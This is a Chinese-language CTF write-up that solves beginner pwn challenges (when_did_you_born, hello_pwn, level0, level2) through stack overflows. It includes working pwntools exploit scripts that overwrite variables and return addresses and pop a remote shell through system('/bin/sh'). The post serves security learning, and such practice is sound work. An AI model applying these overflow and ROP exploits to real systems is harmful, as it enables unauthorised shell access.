pwn入门练习-功防世界

1、CGfsb：https://blog.****.net/zz_Caleb/article/details/88980866

2、when_did_you_born（简单的ROP）

下载文件，是一个64位的elf文件，放到ida中看伪码，报错：

 搜了一下这个问题，是栈的问题，可以通过修改一些设置来解决，但是，找到了main函数：

 在这个地方查看伪码不会报错，而且主函数的源码可以得到：

分析一下伪码，v5==1926会让我们拿到flag，但是，前面对v5进行了过滤，所以我们再输入的时候就不能把v5的值输成1926，那怎么办呢？我们看到最前面给出了v4和v5的位置：

char v4; // [rsp+0h] [rbp-20h]
unsigned int v5; // [rsp+8h] [rbp-18h]

所以v5比v4的地址大了8位，而在输入v4的时候用的是gets函数，不会对输入的字符串长度进行限制，所以我们可以利用变量的溢出，将溢出的数据覆盖v5使v5的值为1926，构造payload = "A"*8 + p32(1926)即可。

下面给出脚本：
 

from pwn import *

p = remote('111.198.29.45', 31788)
p.sendlineafter('Birth?\n', '1998')
payload = 'AAAAAAAA' + p32(1926)
p.sendlineafter('Name?\n', payload)
print(p.recvall())

运行结果：

3、hello_pwn

64位elf文件，ida查看伪码：

 看一下这个sub_400686()函数：

所以我们的目标就是让dword_60106C == 1853186401，read(0, &unk_601068, 0x10uLL)是将键盘输入的数据存储到unk_601068中，我们看一下unk_601068的位置发现unk_601068和dword_60106C 的位置只相差4：

 我们可以对unk_601068进行输入，而且这里也是不限定输入长度的，所以我们可以输入unk_601068使其溢出来把1853186401覆盖到dword_60106C上。

下面给出溢出脚本：

from pwn import *

p  = remote('111.198.29.45', 31876)
payload = 'AAAA' + p64(1853186401)
p.recvuntil('helloworld for bof\n')
p.send(payload)
print(p.recv())

4、level0

checksec分析保护机制:

 可以看到canary和PIE是关闭的，也就是说我们栈中的数据是不被执行的，所以我们虽然仍可进行栈溢出的操作，但是确不能把shellcode写到栈中。

ida查看伪码：

 再看看vulnerable_function()这个函数：

 有个Hello, World字符串，还有就是可以接受键盘输入的数据存到buf中。

我们可以这样来查看一些有用的字符串：

可以看到这里有个/bin/sh的字符串：

 查看这个字符串的位置：

 可以看到是执行了command，我们看看这个指令令是在哪被执行的(可以直接选定command按x，也可以右键进行选择)：

在command指令调用之后，调用了系统，如果我们可以把vulnerable_function()的返回地址改为这个指令的地址，那么我们就可以调用系统，得到系统的shell，当然还是利用溢出。

那么我们就需要确定栈顶地址了，利用溢出确定溢出点的位置就可以了，需要用到pattern工具(有单独的py文件，当然，peda插件中也有)，生成一个长度为150的字符串，然后输入程序使其溢出：

然后可以看到一些反馈信息：

 可以看到rsp，也就是栈顶的信息，也得到了串中溢出的部分，然后计算溢出点（两种方法：有无peda插件）:
使用peda插件的话：

 如果没有peda插件，就要使用指令x/gx $rsp来查看栈顶信息了，然后依然用pattern的offset指令来计算溢出点。

这里可以看到溢出点是136，所以payload就是：payload='A'*0x88 + p64(elf.symbols[callsystem])

给出shellcode：
 

from pwn import *

elf = ELF('./level0')
p = remote('111.198.29.45', 32353)
payload = 'A' * 0x88 + p64(elf.symbols['callsystem'])

p.send(payload)
p.interactive()

拿到权限后查看flag文件即可。

5、level2

下载文件，是一个32位的文件：

NX打开，说明栈中的数据没有执行权限，call esp或者jmp esp的方法就不能使用，但是可以利用rop这种方法绕过

栈中不能写shellcode了。

ida查看伪码：
main函数：

再看下vulnerable_function()函数：

在vulnerable_function()函数中，我们可以对buf进行输入，这就是个可以栈溢出的利用点。
接着查看一下有用的字符串：

 找到了/bin/sh字符串，然后还有main函数中调用的有可以执行系统命令的system函数：

 那么这里的ROP怎么用呢？对buf进行输入(伪码中给出buf的长度：88h)，将其溢出，覆盖掉ebp，将返回地址写成system函数的地址来执行system函数，然后随便写个字符串覆盖掉system函数的返回地址，然后把/bin/sh地址覆盖到system函数的返回地址的上面，这样/bin/sh就当做system函数的参数来执行了。

 buf的输入时调用的read函数，read函数有三个参数，buf是第二个，我们的目的是覆盖Return Address地址到system函数的地址。

payload='a' * 0x88 + 'aaaa' + p32(sys_addr) + p32(0x12345678) + p32(bin_addr)

'a' * 0x88-->填充buf
'aaaa'-->使buf溢出，这部分填充到read函数的第一个参数进行覆盖，是随意字符串
p32(sys_addr)-->system函数的地址，覆盖到了当前函数的返回地址上
p32(0x12345678)-->写在system函数的ebp上，以便下面写入参数的地址，现在对于system函数，read函数就相当于是Caller's Caller's ebp
p32(bin_addr)-->写在system函数参数的地址上，等待调用

shellcode：
 

from pwn import *

p = remote('111.198.29.45', 31065)
elf = ELF('./level2')
sys_addr = elf.symbols['system']
bin_addr = elf.search('/bin/sh').next()

payload = 'a' * 0x88 + 'aaaa' + p32(sys_addr) + p32(0x12345678) + p32(bin_addr)
p.recvline()
p.sendline(payload)
p.interactive()